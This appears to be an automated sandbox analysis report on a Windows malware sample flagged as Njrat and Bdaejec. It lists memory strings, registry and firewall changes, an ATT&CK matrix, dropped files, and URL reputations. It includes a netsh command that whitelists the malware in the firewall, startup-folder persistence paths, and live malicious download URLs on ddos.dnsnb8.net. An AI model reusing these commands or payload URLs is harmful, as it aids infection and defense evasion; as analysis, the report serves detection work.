Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 15:20:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:31:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 14:56:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 14:36:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 08:32:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 13:56:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 14:28:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 03:59:18 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 12:04:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 02:37:14 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/27 \| 22:35:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 04:13:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 18:17:39 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 11:35:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 16:25:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 04:34:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:26:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:27:58 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:50:50 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 12:06:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 06:07:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:55:43 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:42:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 11:58:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 12:32:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:11:24 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 20:45:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 13:15:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/30 \| 06:49:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 07:34:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 04:42:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 04:05:56 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/25 \| 12:37:17 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 07:26:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/20 \| 00:10:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/15 \| 08:21:35 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/23 \| 01:36:17 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/14 \| 23:53:49 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/07/26 \| 09:36:29 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 24/08/22 \| 10:53:00 - Program Manager

Source: C:\Users\user\AppData\Local\Temp\server.exe

Code function: RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,GetLocaleInfoA,

4_2_00B37208

Source: C:\Windows\SysWOW64\netsh.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Code function: 1_2_00AE1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

1_2_00AE1718

Source: C:\Users\user\AppData\Local\Temp\server.exe

Code function: 4_2_00A1820C GetTimeZoneInformation,

4_2_00A1820C

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Code function: 1_2_00AE139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_00AE139F

Source: C:\Users\user\AppData\Local\Temp\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Local\Temp\server.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

Jump to behavior

Modifies the windows firewall

Source: C:\Users\user\AppData\Local\Temp\server.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\AppData\Local\Temp\server.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR

Yara detected Njrat

Source: Yara match	File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: RRqyIX.exe PID: 4888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRqyIX.exe PID: 1216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RRqyIX.exe PID: 64, type: MEMORYSTR

Yara detected Njrat

Source: Yara match	File source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	1 Native API	1 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	11 Input Capture	12 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	11 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	12 Registry Run Keys / Startup Folder	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	12 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	25 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	111 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	32 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LisectAVT_2403002B_366.exe	100%	Avira	W32/Jadtre.B
LisectAVT_2403002B_366.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Notepad.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\RRqyIX.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\server.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Notepad.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RRqyIX.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\server.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Explower.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.scintilla.org/scite.rng	0%	URL Reputation	safe
http://www.rftp.comJosiah	0%	URL Reputation	safe
http://www.activestate.com	0%	URL Reputation	safe
http://www.activestate.comHolger	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	URL Reputation	malware
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.rftp.com	0%	URL Reputation	safe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	URL Reputation	malware
http://www.baanboard.comBrendon	0%	URL Reputation	safe
https://www.smartsharesystems.com/	0%	URL Reputation	safe
http://www.scintilla.org	0%	URL Reputation	safe
http://www.spaceblue.comMathias	0%	URL Reputation	safe
https://www.smartsharesystems.com/Morten	0%	URL Reputation	safe
http://www.develop.com	0%	URL Reputation	safe
http://pki-ocsp.symauth.com0	0%	URL Reputation	safe
http://www.lua.org	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://www.spaceblue.com	0%	URL Reputation	safe
http://www.baanboard.com	0%	URL Reputation	safe
http://www.develop.comDeepak	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k2.rar86)	100%	Avira URL Cloud	phishing
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
http://www.enigmaprotector.com/openU	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarZ	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarM	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarzO	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarH	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k3.rara	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar#O	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rar_	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k5.rar	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rarPO	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k4.rar$	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rar1	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k1.rareM	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rar5	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k4.rar	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarn	100%	Avira URL Cloud	malware
http://www.enigmaprotector.com/	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rarE	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarR	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rard	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarp6	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k3.rarx	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k1.rarc	100%	Avira URL Cloud	phishing
http://ddos.dnsnb8.net:799/cj//k2.rarM	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ddos.dnsnb8.net	44.221.84.105	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	false	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
http://ddos.dnsnb8.net:799/cj//k4.rar	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k2.rarZ	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.scintilla.org/scite.rng	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.comJosiah	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar86)	RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.activestate.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.activestate.comHolger	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07	LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr	false	URL Reputation: safe	unknown
http://www.enigmaprotector.com/openU	LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	RRqyIX.exe, 00000001.00000003.2148360236.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 0000000F.00000003.2336903520.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527841378.0000000000A33000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000002.2611797178.0000000000513000.00000002.00000001.01000000.00000004.sdmp, RRqyIX.exe, 00000016.00000003.2607592735.00000000008E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.1.dr	false	URL Reputation: safe	unknown
http://www.rftp.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarM	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k3.rara	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr	LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarH	RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarzO	RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.baanboard.comBrendon	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.smartsharesystems.com/	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
